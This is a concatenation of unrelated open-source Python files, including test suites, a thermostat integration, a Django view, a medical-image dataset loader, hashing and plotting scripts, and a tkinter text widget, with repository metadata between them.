torrent = NamedTemporaryFile()
action = processor._process_file(torrent.name, destination)
self.assertEquals(action, CopyAction(torrent.name, destination))
def test_process_file_when_it_is_an_archive(self):
destination = 'destination'
processor = Processor(None, destination)
torrent = NamedTemporaryFile(suffix='.rar')
action = processor._process_file(torrent.name, destination)
self.assertEquals(action, UnrarAction(torrent.name, destination))
def test_process(self):
destination = mkdtemp()
torrent = mkdtemp()
ignored_dir = mkdtemp(prefix='ignored_dir', dir=torrent)
some_file = NamedTemporaryFile(prefix='some_file', dir=torrent)
rar_file = NamedTemporaryFile(suffix='.rar', dir=torrent)
processor = Processor(torrent, destination)
processor.process()
self.assertTrue(len(processor.actions) == 3)
new_torrent_dir = self._build_path(destination, torrent)
self.assertTrue(NoAction(ignored_dir, new_torrent_dir) in processor.actions)
self.assertTrue(CopyAction(some_file.name, new_torrent_dir) in processor.actions)
self.assertTrue(UnrarAction(rar_file.name, new_torrent_dir) in processor.actions)
def test_process_when_paths_are_mapped(self):
destination = mkdtemp()
torrent_base = mkdtemp()
torrent = mkdtemp(dir=torrent_base)
path_mapping = {'some_base': torrent_base}
ignored_dir = mkdtemp(prefix='ignored_dir', dir=torrent)
some_file = NamedTemporaryFile(prefix='some_file', dir=torrent)
rar_file = NamedTemporaryFile(suffix='.rar', dir=torrent)
processor = Processor(self._build_path('some_base', basename(torrent)), destination, path_mapping)
processor.process()
self.assertTrue(len(processor.actions) == 3)
new_torrent_dir = self._build_path(destination, torrent)
self.assertTrue(NoAction(ignored_dir, new_torrent_dir) in processor.actions)
self.assertTrue(CopyAction(some_file.name, new_torrent_dir) in processor.actions)
self.assertTrue(UnrarAction(rar_file.name, new_torrent_dir) in processor.actions)
def test_execute(self):
pwd = dirname(realpath(__file__))
destination = mkdtemp()
torrent = mkdtemp()
copy2(self._build_path(pwd, 'file.rar'), torrent)
_ = mkdtemp(prefix='ignored_dir', dir=torrent)
some_file = NamedTemporaryFile(prefix='some_file', dir=torrent)
_ = torrent + '/file.rar'
processor = Processor(torrent, destination)
processor.process()
processor.execute()
new_torrent_dir = listdir(self._build_path(destination, torrent))
self.assertTrue(basename(torrent) in listdir(destination))
self.assertTrue(basename(some_file.name) in new_torrent_dir)
self.assertTrue('file.txt' in new_torrent_dir)
self.assertTrue('file.rar' not in new_torrent_dir)
@staticmethod
def _build_path(destination, torrent):
return destination + '/' + basename(torrent)
| 2.765625 | 3 |
aoc_2018/day_3/python/test_day3_puzzle1.py | girip11/advent_of_code | 0 | 12786300 | import os
from pathlib import Path
from typing import List
from aoc_2018.day_3.python.day3_puzzle1 import (
Claim,
find_square_inches_with_overlapping_claims,
parse_claim,
)
def get_input(input_file_name: str) -> List[Claim]:
input_file_path: str = os.path.join(Path(os.path.dirname(__file__)).parent, input_file_name)
claims: List[Claim] = []
with open(input_file_path) as input_file:
claims = [parse_claim(claim_str) for claim_str in input_file]
return claims
def test_find_square_inches_with_multiple_claims_simple() -> None:
assert find_square_inches_with_overlapping_claims(get_input("puzzle1_simple_input.txt")) == 4
def test_find_square_inches_with_multiple_claims_complex() -> None:
assert find_square_inches_with_overlapping_claims(get_input("puzzle_input.txt")) == 107663
| 3.28125 | 3 |
p3/test.py | aryan-gupta/MATH1165 | 0 | 12786301 |
import os
for i in range(28):
print("Test case: ", i)
os.system(f"echo {i} | ./a.out | grep \"Enter\"") | 2.40625 | 2 |
src/synamic/core/default_data/__init__.py | SabujXi/SynamicX | 7 | 12786302 | from synamic.core.default_data._manager import DefaultDataManager
| 1.125 | 1 |
odmltables/xls_style.py | fabianschlebusch/python-odmltables | 6 | 12786303 | <filename>odmltables/xls_style.py
# -*- coding: utf-8 -*-
"""
"""
class XlsStyle():
"""
class to create a stylestring to use in xlwt.easyxf
:param backcolor: color of the background of the cell
:param fontcolor: color of the text inside the cell
:param fontstyle: style of the text inside the cell ('bold 1' or '')
:type backcolor: string
:type fontcolor: string
:type fontstyle: string
"""
def __init__(self, backcolor='black', fontcolor='white', fontstyle='bold'):
self.backcolor = backcolor
self.fontcolor = fontcolor
self.fontstyle = fontstyle
def get_style_string(self):
"""
returns a style_string that can be used to create a cell-style with
xlwt.easyxf
"""
s = (f"font: {self.fontstyle} , color {self.fontcolor}; pattern: pattern solid, fore_colour {self.backcolor};")
return s
| 3.421875 | 3 |
edmunds/foundation/testing/testcase.py | LowieHuyghe/edmunds-python | 4 | 12786304 | <gh_stars>1-10
import os
import sys
import threading
import time
import unittest
from edmunds.globals import abc, ABC
import edmunds.support.helpers as helpers
import tempfile
import shutil
class TestCase(unittest.TestCase, ABC):
"""
A UnitTest Test Case
"""
def set_up(self):
"""
Set up the test case
"""
# Create the application
if not hasattr(self, 'app'):
self.app = self.create_application()
# The env testing test file
self.env_testing_test_file = os.path.join(self.app.config.root_path, '.env.testing.test.py')
if os.path.exists(self.env_testing_test_file):
os.remove(self.env_testing_test_file)
self.app = self.create_application()
# Temp dirs and files
self._temp_files = []
self._temp_dirs = []
def tear_down(self):
"""
Tear down the test case
"""
# Remove env-testing-file
if os.path.exists(self.env_testing_test_file):
os.remove(self.env_testing_test_file)
# Clean temp files and dirs
for temp_file in self._temp_files:
if os.path.isfile(temp_file):
os.remove(temp_file)
for temp_dir in self._temp_dirs:
if os.path.isdir(temp_dir):
shutil.rmtree(temp_dir)
@abc.abstractmethod
def create_application(self):
"""
Create the application for testing
:return: Application
:rtype: edmunds.application.Application
"""
pass
def write_config(self, config, overwrite=True):
"""
Write to test config file
:param config: The config to write
:type config: str|list
:param overwrite: Overwrite the current config
:type overwrite: bool
:return: The file written to
:rtype: str
"""
if not os.path.exists(self.env_testing_test_file):
overwrite = True
write_permissions = 'w' if overwrite else 'w+'
with open(self.env_testing_test_file, write_permissions) as f:
f.write('\n')
if isinstance(config, list):
f.writelines(config)
else:
f.write(config)
f.write('\n')
return self.env_testing_test_file
def thread(self, target, count=1000):
"""
Test thread safety of function
:param target: The target function
:type target: Callable
:param count: The call count
:type count: int
"""
for _ in self.thread_iter(target, count):
pass
def thread_iter(self, target, count=1000):
"""
Test thread safety of function
:param target: The target function
:type target: Callable
:param count: The call count
:type count: int
"""
threads = {}
# Make all the threads
for index in range(count):
threads[index] = threading.Thread(target=target)
# Start all the thread (for minimun delay this is done after constructing the threads)
for index in threads:
threads[index].start()
# Wait for each thread to finish
while len(threads) > 0:
for index in list(threads.keys()):
if not threads[index].isAlive():
yield index
del threads[index]
time.sleep(0.01)
def rand_str(self, length=20):
"""
Get random string of certain length
:param length: The length of the string
:return: Random string
"""
return helpers.random_str(length)
def rand_int(self, min, max):
"""
Get random integer
:param min: Minimum value (included)
:param max: Maximum value (included)
:return: Random integer
"""
return helpers.random_int(min, max)
def temp_file(self, only_path=False, suffix='', prefix='tmp'):
"""
Get temp file
:param only_path: Only return the path
:param suffix: File suffix
:param prefix: File prefix
:return: Path to temp file
"""
path = tempfile.mktemp(suffix=suffix, prefix=prefix)
if only_path and os.path.isfile(path):
os.remove(path)
self._temp_files.append(path)
return path
def write_temp_file(self, content, suffix='', prefix='tmp'):
"""
Write to temp file
:param content: The content to write to file
:param suffix: File suffix
:param prefix: File prefix
:return: The file path
"""
path = self.temp_file(suffix=suffix, prefix=prefix)
with open(path, 'w') as file:
file.write(content)
return path
def temp_dir(self, only_path=False, suffix='', prefix='tmp'):
"""
Get temp dir
:param only_path: Only return the path
:param suffix: File suffix
:param prefix: File prefix
:return: Path to temp dir
"""
path = tempfile.mkdtemp(suffix=suffix, prefix=prefix)
if only_path and os.path.isdir(path):
shutil.rmtree(path)
self._temp_dirs.append(path)
return path
def directory(self):
"""
Get the tests directory
:return: Directory
"""
current_dir = os.path.dirname(os.path.abspath(__file__))
tests_dir = os.path.join(current_dir, os.pardir, os.pardir, os.pardir, 'tests')
tests_dir = os.path.abspath(tests_dir)
return tests_dir
def setUp(self):
self.set_up()
def tearDown(self):
self.tear_down()
def assert_equal(self, a, b, msg=None):
"""
a == b
"""
return self.assertEqual(a, b, msg=msg)
def assert_not_equal(self, a, b, msg=None):
"""
a != b
"""
return self.assertNotEqual(a, b, msg=msg)
def assert_true(self, x, msg=None):
"""
bool(x) is True
"""
return self.assertTrue(x, msg=msg)
def assert_false(self, x, msg=None):
"""
bool(x) is False
"""
return self.assertFalse(x, msg=msg)
def assert_is(self, a, b, msg=None):
"""
a is b
"""
return self.assertIs(a, b, msg=msg)
def assert_is_not(self, a, b, msg=None):
"""
a is not b
"""
return self.assertIsNot(a, b, msg=msg)
def assert_is_none(self, x, msg=None):
"""
x is None
"""
return self.assertIsNone(x, msg=msg)
def assert_is_not_none(self, x, msg=None):
"""
x is not None
"""
return self.assertIsNotNone(x, msg=msg)
def assert_in(self, a, b, msg=None):
"""
a in b
"""
return self.assertIn(a, b, msg=msg)
def assert_not_in(self, a, b, msg=None):
"""
a not in b
"""
return self.assertNotIn(a, b, msg=msg)
def assert_is_instance(self, a, b, msg=None):
"""
isinstance(a, b)
"""
return self.assertIsInstance(a, b, msg=msg)
def assert_not_is_instance(self, a, b, msg=None):
"""
not isinstance(a, b)
"""
return self.assertNotIsInstance(a, b, msg=msg)
def assert_raises(self, exc, *args, **kwds):
"""
fun(*args, **kwds) raises exc
"""
return self.assertRaises(exc, *args, **kwds)
def assert_raises_regexp(self, exc, r, *args, **kwds):
"""
fun(*args, **kwds) raises exc and the message matches regex r
"""
if sys.version_info >= (3, 0):
return self.assertRaisesRegex(exc, r, *args, **kwds)
return self.assertRaisesRegexp(exc, r, *args, **kwds)
def assert_almost_equal(self, a, b, msg=None):
"""
round(a-b, 7) == 0
"""
return self.assertAlmostEqual(a, b, msg=msg)
def assert_not_almost_equal(self, a, b, msg=None):
"""
round(a-b, 7) != 0
"""
return self.assertNotAlmostEqual(a, b, msg=msg)
def assert_greater(self, a, b, msg=None):
"""
a > b
"""
return self.assertGreater(a, b, msg=msg)
def assert_greater_equal(self, a, b, msg=None):
"""
a >= b
"""
return self.assertGreaterEqual(a, b, msg=msg)
def assert_less(self, a, b, msg=None):
"""
a < b
"""
return self.assertLess(a, b, msg=msg)
def assert_less_equal(self, a, b, msg=None):
"""
a <= b
"""
return self.assertLessEqual(a, b, msg=msg)
def assert_regexp_matches(self, s, r, msg=None):
"""
r.search(s)
"""
if sys.version_info >= (3, 0):
return self.assertRegex(s, r, msg=msg)
return self.assertRegexpMatches(s, r, msg=msg)
def assert_not_regexp_matches(self, s, r, msg=None):
"""
not r.search(s)
"""
if sys.version_info >= (3, 0):
return self.assertNotRegex(s, r, msg=msg)
return self.assertNotRegexpMatches(s, r, msg=msg)
def assert_multi_line_equal(self, a, b, msg=None):
"""
strings
"""
return self.assertMultiLineEqual(a, b, msg=msg)
def assert_sequence_equal(self, a, b, msg=None):
"""
sequences
"""
return self.assertSequenceEqual(a, b, msg=msg)
def assert_list_equal(self, a, b, msg=None):
"""
lists
"""
return self.assertListEqual(a, b, msg=msg)
def assert_tuple_equal(self, a, b, msg=None):
"""
tuples
"""
return self.assertTupleEqual(a, b, msg=msg)
def assert_dict_equal(self, a, b, msg=None):
"""
dicts
"""
return self.assertDictEqual(a, b, msg=msg)
def skip(self, reason):
"""
Skip this test
"""
return self.skipTest(reason)
def assert_equal_deep(self, expected, value, check_type=True, msg=None):
"""
Assert equal deep
:param expected: The expected value
:param value: The value
:param check_type: Do type check
:return:
"""
if isinstance(expected, dict):
self.assert_is_instance(value, dict, msg=msg)
for i in range(0, len(expected)):
self.assert_equal_deep(sorted(expected)[i], sorted(value)[i], check_type=check_type, msg=msg)
self.assert_equal_deep(expected[sorted(expected)[i]], value[sorted(value)[i]], check_type=check_type, msg=msg)
elif isinstance(expected, list):
self.assert_is_instance(value, list, msg=msg)
for i in range(0, len(expected)):
self.assert_equal_deep(expected[i], value[i], check_type=check_type, msg=msg)
else:
self.assert_equal(expected, value, msg=msg)
if check_type:
self.assert_is_instance(value, type(expected), msg=msg)
| 2.59375 | 3 |
homeassistant/components/thermostat/proliphix.py | davidedmundson/home-assistant | 0 | 12786305 | <reponame>davidedmundson/home-assistant<gh_stars>0
"""
homeassistant.components.thermostat.proliphix
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The Proliphix NT10e Thermostat is an ethernet connected thermostat.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/thermostat.proliphix/
"""
from homeassistant.components.thermostat import (
STATE_COOL, STATE_HEAT, STATE_IDLE, ThermostatDevice)
from homeassistant.const import (
CONF_HOST, CONF_PASSWORD, CONF_USERNAME, TEMP_FAHRENHEIT)
REQUIREMENTS = ['proliphix==0.1.0']
def setup_platform(hass, config, add_devices, discovery_info=None):
""" Sets up the Proliphix thermostats. """
username = config.get(CONF_USERNAME)
password = <PASSWORD>(CONF_PASSWORD)
host = config.get(CONF_HOST)
import proliphix
pdp = proliphix.PDP(host, username, password)
add_devices([
ProliphixThermostat(pdp)
])
class ProliphixThermostat(ThermostatDevice):
""" Represents a Proliphix thermostat. """
def __init__(self, pdp):
self._pdp = pdp
# initial data
self._pdp.update()
self._name = self._pdp.name
@property
def should_poll(self):
""" Polling needed for thermostat.. """
return True
def update(self):
""" Update the data from the thermostat. """
self._pdp.update()
@property
def name(self):
""" Returns the name of the thermostat. """
return self._name
@property
def device_state_attributes(self):
""" Returns device specific state attributes. """
return {
"fan": self._pdp.fan_state
}
@property
def unit_of_measurement(self):
""" Returns the unit of measurement. """
return TEMP_FAHRENHEIT
@property
def current_temperature(self):
""" Returns the current temperature. """
return self._pdp.cur_temp
@property
def target_temperature(self):
""" Returns the temperature we try to reach. """
return self._pdp.setback_heat
@property
def operation(self):
""" Returns the current state of the thermostat. """
state = self._pdp.hvac_state
if state in (1, 2):
return STATE_IDLE
elif state == 3:
return STATE_HEAT
elif state == 6:
return STATE_COOL
def set_temperature(self, temperature):
""" Set new target temperature. """
self._pdp.setback_heat = temperature
| 2.484375 | 2 |
modules/social_security/reduction_info/code/reduction_add_views.py | xuhuiliang-maybe/ace_office | 1 | 12786306 | # coding=utf-8
import traceback
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.contrib.auth.decorators import permission_required
from django.contrib.messages.views import SuccessMessageMixin
from django.core.urlresolvers import reverse
from django.views.generic.edit import CreateView
from modules.employee_management.employee_info.models import Employee
from modules.share_module.permissionMixin import class_view_decorator
from modules.social_security.reduction_info.models import Reduction
@class_view_decorator(login_required)
@class_view_decorator(permission_required('reduction_info.add_reduction', raise_exception=True))
class ReductionCreate(SuccessMessageMixin, CreateView):
model = Reduction
template_name = "base/document_edit.html"
fields = ["emplyid", "remark", "remark1", "remark2"]
success_message = u"%(emplyid)s 成功创建"
def get_success_url(self):
self.url = reverse('reduction_info:reduction_list', args=())
referrer = self.request.POST.get("referrer", "")
# if referrer:
# self.url = referrer
_addanother = self.request.POST.get("_addanother", "")
if _addanother:
self.url = reverse('reduction_info:reduction_add')
return self.url
# 增加返回参数
def get_context_data(self, **kwargs):
context = super(ReductionCreate, self).get_context_data(**kwargs)
context["form_content"] = u"新增减员信息"
referrer = self.request.META.get('HTTP_REFERER', "")
context["referrer"] = referrer
return context
def form_valid(self, form):
# 校验当前登录用户,不是录入项目的负责人是,阻止录入
try:
login_user = self.request.user
emplyid = self.request.POST.get("emplyid", 0) # 员工编号
if not emplyid:
messages.warning(self.request, u"请选择您所负责的“员工编号”")
return super(ReductionCreate, self).form_invalid(form)
emp_obj = Employee.objects.filter(id=emplyid)
principal = ""
if emp_obj.exists():
principal = emp_obj[0].project_name.principal
if login_user != principal:
messages.warning(self.request, u"请选择您所负责的“员工编号”")
return super(ReductionCreate, self).form_invalid(form)
except:
traceback.print_exc()
return super(ReductionCreate, self).form_valid(form)
| 1.835938 | 2 |
ltr/dataset/lumbar3d.py | DeepBrainsMe/PyDoctor_Final | 1 | 12786307 | import json
import os
import SimpleITK as sitk
import numpy
import pydicom
import numpy as np
from ltr.admin.environment import env_settings
from ltr.data.processing_utils import str_analyse
from ltr.dataset.base_dataset import BaseDataset
from pydoctor.evaluation import Study
from pydoctor.evaluation.data import StudyList
def _read_file(path):
with open(path, 'r') as f:
json_file = json.loads(f.read())
return json_file
class Lumbar3d(BaseDataset):
"""
The Lumbar dataset from official TianChi competition.
organized as follows.
-lumbar
-lumbar_testA50
-study...
-lumbar_train150
-study...
-lumbar_train51
-study...
lumbar_train150_annotation.json
lumbar_train51_annotation.json
"""
def __init__(self, root=None, split='train'):
"""
args:
:param root:path to the lumbar dataset.
:param split: string name 'train','val','test'
"""
root = env_settings().lumbar_dir if root is None else root
super().__init__('lumbar', root)
# dataset split for competition.
if split == 'train':
self.studies_path = os.path.join(root, 'DatasetA','lumbar_train150')
self.anno_path = os.path.join(root, 'DatasetA','lumbar_train150_annotation.json')
self.anno_meta = self._load_anno(self.anno_path)
elif split == 'val':
self.studies_path = os.path.join(root, 'DatasetA','lumbar_train51')
self.anno_path = os.path.join(root, 'DatasetA','lumbar_train51_annotation.json')
self.anno_meta = self._load_anno(self.anno_path)
elif split == 'testA':
self.studies_path = os.path.join(root,'datasetA','lumbar_testA50')
elif split == 'testB':
self.studies_path = os.path.join(root, 'datasetB', 'lumbar_testB50')
else:
raise ValueError('Unknow split name.')
# All folders inside the root.
self.study_list = self._get_study_list()
self.body_id = {'L1':0,'L2':1,'L3':2,'L4':3,'L5':4}
self.body_class = {'V1':0,'V2':1}
self.disc_id = {'T12-L1':0,'L1-L2':1,'L2-L3':2,'L3-L4':3,'L4-L5':4,'L5-S1':5}
self.disc_class = {'V1':0,'V2':1,'V3':2,'V4':3,'V5':4}
def _get_study_list(self):
return os.listdir(self.studies_path)
def get_name(self):
return 'lumbar'
def _get_study_path(self, std_id):
return os.path.join(self.studies_path, self.study_list[std_id])
def _get_key_image_info(self, folder,frame_num=3):
global key_image_path
reader = sitk.ImageSeriesReader()
file_path = os.path.join(folder, os.listdir(folder)[0])
study_uid = pydicom.read_file(file_path).get(0x0020000d).value
study_meta = self.anno_meta[str(study_uid)]
dicom_path_list = reader.GetGDCMSeriesFileNames(folder, study_meta['seriesUid'])
dicom_slice = [[pydicom.read_file(file), file] for file in dicom_path_list]
dicom_slice.sort(key=lambda x: float(x[0].ImagePositionPatient[0]))
data_path = dicom_slice[len(dicom_path_list) // 2][1]
middile_index = study_meta['point'][0]['zIndex']
frame_list = []
for dcm_path in range(middile_index - frame_num // 2,middile_index + frame_num // 2 + 1,1):
frame_list.append(np.squeeze(sitk.GetArrayFromImage(sitk.ReadImage(dicom_slice[dcm_path][1]))))
key_image = numpy.stack(frame_list,axis=0)
key_image = np.uint8((key_image - key_image.min()) / (key_image.max() - key_image.min()) * 255.0)
return key_image, study_meta['point']
def _load_anno(self, anno_path):
anno_list = _read_file(anno_path)
anno_dict = {}
for anno in anno_list:
tmp_dict = {anno['studyUid']: {'seriesUid': anno['data'][0]['seriesUid'],
'instanceUid': anno['data'][0]['instanceUid'],
'point': anno['data'][0]['annotation'][0]['data']['point']}}
anno_dict.update(tmp_dict)
return anno_dict
def _deal_point_dict(self,point_list):
body_dict,disc_dict = {},{}
for ann in point_list:
coord = ann.get('coord',None)
identification = ann['tag'].get('identification',None)
if identification in self.body_id:
class_num = self.body_class[str_analyse(ann['tag'].get('vertebra','v1').upper())]
body_dict.update({identification:{'coord':coord,'class_num':class_num}})
elif identification in self.disc_id:
class_num = self.disc_class[str_analyse(ann['tag'].get('disc','v1').upper())]
disc_dict.update({identification:{'coord':coord,'class_num':class_num}})
return body_dict, disc_dict
def get_frames(self, std_id, frame_num=5,anno=None):
dicom_folder = self._get_study_path(std_id)
key_frame,point_list = self._get_key_image_info(dicom_folder)
body_dict, disc_dict = self._deal_point_dict(point_list)
return key_frame, body_dict, disc_dict
def get_study_list(self):
return StudyList([self._construct_study(s) for s in self.study_list])
def _construct_study(self,study_name):
study_folder_path = os.path.join(self.studies_path,study_name)
# series_ids = sitk.ImageSeriesReader.GetGDCMSeriesIDs(study_folder_path)
# for id in series_ids:
file_list = [os.path.join(study_folder_path,i) for i in os.listdir(study_folder_path)]
dicom_slice = [[pydicom.read_file(file),file]for file in file_list]
dicom_slice.sort(key=lambda x:float(x[0].ImagePositionPatient[0]))
data_path = dicom_slice[len(file_list)//2][1]
return Study(name=study_name,dataset='lumbar_test',frame_path=data_path,index=len(file_list)//2)
| 2.34375 | 2 |
qaforum/utils.py | UREDDY616/IIITVforum | 117 | 12786308 | <gh_stars>100-1000
import pytz
from datetime import datetime
from django.utils import timezone
from math import log
# uses a version of reddit score algorithm
# https://medium.com/hacking-and-gonzo/how-reddit-ranking-algorithms-work-ef111e33d0d9#.aef67efq1
def question_score(question):
creation_date = question.pub_date
score = question.total_points
answers_positive_points = list(
question.answer_set.all().values_list(
'answervote__value', flat=True)).count(True)
answers_negative_points = list(
question.answer_set.all().values_list(
'answervote__value', flat=True)).count(False)
score = score * 2 + answers_positive_points - answers_negative_points
reference_date = pytz.timezone(
timezone.get_default_timezone_name()).localize(datetime(1970, 1, 1))
difference = creation_date - reference_date
difference_seconds = difference.days * 86400 + difference.seconds +\
(float(difference.microseconds) / 1000000)
order = log(max(abs(score), 1), 10)
sign = 1 if score > 0 else -1 if score < 0 else 0
seconds = difference_seconds - 1134028003
return round(sign * order + seconds / 45000, 7)
| 2.65625 | 3 |
Hashing/sha2.py | Prakash-sa/Crypto | 0 | 12786309 | import hashlib
# initialize a string
str = "Crypto"
# encode the string
encoded_str = str.encode()
# create sha-2 hash objects initialized with the encoded string
hash_obj_sha224 = hashlib.sha224(encoded_str) # SHA224
hash_obj_sha256 = hashlib.sha256(encoded_str) # SHA256
hash_obj_sha384 = hashlib.sha384(encoded_str) # SHA384
hash_obj_sha512 = hashlib.sha512(encoded_str) # SHA512
# print
print("\nSHA224 Hash: ", hash_obj_sha224.hexdigest())
print("\nSHA256 Hash: ", hash_obj_sha256.hexdigest())
print("\nSHA384 Hash: ", hash_obj_sha384.hexdigest())
print("\nSHA512 Hash: ", hash_obj_sha512.hexdigest())
| 3.328125 | 3 |
plot_meta.py | BFYFlorence/RAF | 0 | 12786310 | <gh_stars>0
import matplotlib.pyplot as plt
import numpy as np
target_file = "/Users/erik/Desktop/metadynamics/learn/"
def hills(target_file,dictator=None):
y = []
with open(target_file) as f:
for i in f.readlines():
record = i.strip().split()
print(record)
if record[0][0]!='#':
y.append(float(record[1]))
fig = plt.figure(num=1, figsize=(15, 8),dpi=80)
ax1 = fig.add_subplot(1,1,1)
ax1.set_title('Figure')
ax1.set_xlabel('ps')
ax1.set_ylabel(dictator)
ax1.plot(range(len(y)),y,color='g',marker='+')
plt.show()
def colvar(target_fil,dictator=None):
y1 = []
y2 = []
with open(target_file) as f:
for i in f.readlines():
record = i.strip().split()
print(record)
if record[0][0] != '#':
y1.append(float(record[1]))
y2.append(float(record[2]))
fig = plt.figure(num=1, figsize=(15, 8), dpi=80)
ax1 = fig.add_subplot(1, 1, 1)
ax1.set_title('Figure')
ax1.set_xlabel('ps')
ax1.set_ylabel(dictator)
ax1.scatter(range(len(y1)), y1, color='r', marker='+')
# ax1.scatter(range(len(y2)), y2, color='g', marker='+')
plt.show()
def free_energy(target_file, dictator=None):
x = []
y = []
with open(target_file) as f:
for i in f.readlines():
record = i.strip().split()
print(record)
if record[0][0] != '#':
x.append(float(record[0]))
y.append(float(record[1]))
fig = plt.figure(num=1, figsize=(15, 8), dpi=80)
ax1 = fig.add_subplot(1, 1, 1)
ax1.set_title('Figure')
ax1.set_xlabel('ps')
ax1.set_ylabel(dictator)
ax1.plot(x, y, color='r', marker='+')
# ax1.scatter(range(len(y2)), y2, color='g', marker='+')
plt.show()
def convergence(target_file, dictator=None):
for i in range(11):
path = target_file+"fes_{0}.dat".format(i*10)
x = []
y = []
with open(path) as f:
for i in f.readlines():
record = i.strip().split()
# print(record)
if record[0][0] != '#':
x.append(float(record[0]))
y.append(float(record[1]))
fig = plt.figure(num=1, figsize=(15, 8), dpi=80)
ax1 = fig.add_subplot(1, 1, 1)
ax1.set_title('Figure')
ax1.set_xlabel('psi')
ax1.set_ylabel(dictator)
ax1.plot(x, y)
# ax1.scatter(range(len(y2)), y2, color='g', marker='+')
plt.show()
# hills(target_file, dictator="freeenergy")
# colvar(target_file)
# free_energy(target_file, dictator="free_energy")
convergence(target_file, dictator="free_energy")
| 2.703125 | 3 |
layoutx/widgets/textarea.py | 8or5q/LayoutX | 61 | 12786311 | from .widget import Widget
import tkinter as tk
from tkinter import Frame, Text, Scrollbar, Pack, Grid, Place, INSERT, END, Toplevel, Listbox
from tkinter.constants import RIGHT, LEFT, Y, BOTH
from tkinter.font import Font, BOLD, nametofont
from .scroll_frame import AutoScrollbar
from pygments.styles import get_style_by_name
from pygments.lexers import get_lexer_by_name
from ttkwidgets.autocomplete import AutocompleteEntryListbox
class ScrolledText(Text):
def __init__(self, master=None, **kw):
self.frame = Frame(master)
self.vbar = AutoScrollbar(self.frame, orient="vertical")
self.vbar.grid(row=0, column=1, sticky="ns")
self.frame.grid_columnconfigure(0, weight=1)
self.frame.grid_columnconfigure(1, weight=0)
self.frame.grid_rowconfigure(0, weight=1)
kw.update({'yscrollcommand': self.vbar.set})
Text.__init__(self, self.frame, **kw)
self.vbar['command'] = self.yview
Text.grid(self, row=0, column=0, sticky="news")
# Copy geometry methods of self.frame without overriding Text
# methods -- hack!
text_meths = vars(Text).keys()
methods = vars(Pack).keys() | vars(Grid).keys() | vars(Place).keys()
methods = methods.difference(text_meths)
for m in methods:
if m[0] != '_' and m != 'config' and m != 'configure' and m not in ["grid", "pack"]:
setattr(self, m, getattr(self.frame, m))
def __str__(self):
return str(self.frame)
def pack(self, *args, **kwargs):
self.frame.pack(*args, **kwargs)
#self.frame.pack_propagate(False)
def grid(self, *args, **kwargs):
self.frame.grid(*args, **kwargs)
class TextArea(Widget):
def __init__(self, master, **kwargs):
super().__init__(tk=ScrolledText(master=master, wrap=tk.WORD), **kwargs)
self._spaces = ' '
self._lexer = None
self._lexer_style = None
self._autocomplete_list = None
self._tk.bind('<KeyRelease>', self._set_data)
self._tk.bind('<Tab>', self._tab_to_spaces)
self._tk.bind('<Return>', self._autoindent)
self._tk.bind("<Control-KeyRelease-plus>", self._increase_size)
self._tk.bind("<Control-KeyRelease-minus>", self._decrease_size)
self._tk.bind("<Control-KeyRelease-space>", self._autocomplete)
self._value_setter = self.connect_to_prop("value", self.on_changed_value)
self.connect_to_prop("spaces", self._on_changed_spaces)
self.connect_to_prop("language", self._on_changed_language)
self.connect_to_prop("highlightstyle", self._on_changed_highlightstyle)
self.connect_to_prop("autocomplete", self._on_changed_autocomplete)
def _on_changed_autocomplete(self, value):
self._autocomplete_list = value
def _autocomplete(self, event):
if not self._autocomplete_list or len(self._autocomplete_list) == 0:
return
index = self._tk.index(INSERT).split(".")
self._text_index = '.'.join(index)
tw = Toplevel(self._tk)
tw.wm_overrideredirect(True)
font = self._get_font()
font_size = int(font.cget("size"))
tw.geometry(f"+{ self._tk.winfo_rootx() + int(index[1]) * int(font_size / 2) }+{ self._tk.winfo_rooty() + int(index[0]) * font_size }")
self._listbox = AutocompleteEntryListbox(tw, font=font, allow_other_values=False, completevalues=[v["name"] for v in self._autocomplete_list])
self._listbox.pack()
tw.lift()
tw.focus_force()
tw.grab_set()
tw.grab_release()
self._listbox.focus_force()
self._listbox.listbox.bind("<Double-Button-1>", self._autocomplete_selected)
self._listbox.entry.bind("<Return>", self._autocomplete_selected)
self._listbox.bind("<Leave>", self._autocomplete_destroy)
self._listbox.bind("<Escape>", self._autocomplete_destroy)
self._autocomplete_window = tw
def _autocomplete_selected(self, event):
value = next(v["value"] for v in self._autocomplete_list if v["name"] == self._listbox.get())
self._tk.insert(self._text_index, value)
self._listbox.event_generate("<Leave>")
def _autocomplete_destroy(self, event):
if self._autocomplete_window:
self._autocomplete_window.destroy()
self._autocomplete_window = None
self._tk.focus_force()
self._tk.mark_set("insert", self._text_index)
def _get_font(self):
return nametofont(self.get_style_attr('font'))
def _increase_size(self, event):
font = self._get_font()
font.configure(size=int(font.cget("size") + 1))
#self._tk.configure(font=font)
def _decrease_size(self, event):
font = self._get_font()
font.configure(size=int(font.cget("size") - 1))
#self._tk.configure(font=font)
def _highlight(self):
if not self._lexer:
return
code = self._get_text()
self._tk.mark_set("range_start", "1" + ".0")
for token, value in self._lexer.get_tokens(code):
if len(value) == 0:
continue
self._tk.mark_set("range_end", "range_start + %dc" % len(value))
self._tk.tag_add(str(token), "range_start", "range_end")
self._tk.mark_set("range_start", "range_end")
def _on_changed_highlightstyle(self, value):
self._lexer_style = get_style_by_name(value)
self._tk.configure(
background=self._lexer_style.background_color,
insertbackground=self._lexer_style.highlight_color,
foreground=self._lexer_style.highlight_color)
for tag in self._tk.tag_names():
self._tk.tag_delete(tag)
for token, value in self._lexer_style.styles.items():
token_value = value.split(' ')
foreground = list(filter(lambda x: x.startswith("#"), token_value))
if len(foreground) == 0:
continue
if str(token) == "Token.Text":
self._tk.configure(
insertbackground=foreground[0],
foreground=foreground[0])
self._tk.tag_configure(str(token), foreground=foreground[0])
self._highlight()
def _on_changed_language(self, value):
if value:
self._lexer = get_lexer_by_name(value)
def _on_changed_spaces(self, value):
self._spaces = ''.join([" "] * int(value))
def _autoindent(self, event):
indentation = ""
lineindex = self._tk.index("insert").split(".")[0]
linetext = self._tk.get(lineindex+".0", lineindex+".end")
for character in linetext:
if character in [" ","\t"]:
indentation += character
else:
break
self._tk.insert(self._tk.index("insert"), "\n"+indentation)
return "break"
def _tab_to_spaces(self, event):
self._tk.insert(self._tk.index("insert"), self._spaces)
return "break"
def _get_text(self):
return self._tk.get("1.0", tk.END)[:-1]
def _set_data(self, event):
if self._value_setter:
self._value_setter(self._get_text())
def on_changed_value(self, value):
if value:
index = self._tk.index(tk.INSERT)
